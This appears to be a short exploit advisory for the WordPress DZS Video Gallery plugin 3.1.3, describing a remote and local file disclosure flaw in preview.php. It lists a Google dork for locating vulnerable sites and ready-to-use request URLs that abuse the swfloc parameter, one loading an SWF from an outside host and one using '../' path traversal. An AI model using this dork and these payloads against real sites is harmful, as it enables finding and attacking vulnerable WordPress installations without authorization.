16 lines
No EOL
763 B
Text
16 lines
No EOL
763 B
Text
# Exploit Title: WordPress DZS Video Gallery (dzs-videogallery) 3.1.3 Plugins Remote and Local File Disclosure Vulnerability (only .SWF)
|
|
# Google Dork: inurl:/wp-content/plugins/dzs-videogallery/
|
|
# Vendor Homepage: http://digitalzoomstudio.net/
|
|
# Version: ALL
|
|
# Affected File: preview.php
|
|
# Date: 03/12/2013
|
|
# Exploit Author: aceeeeeeeer
|
|
# Contact: http://www.twitter.com/aceeeeeeeer
|
|
# Tested on: Linux
|
|
|
|
Exploit:
|
|
/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=[
|
|
SWF LINK ]
|
|
|
|
http://localhost/wp/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=http://www.cristgaming.com/pirate.swf
|
|
http://localhost/wp/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=../../../../uploads/2013/12/The_Exorcist.swf |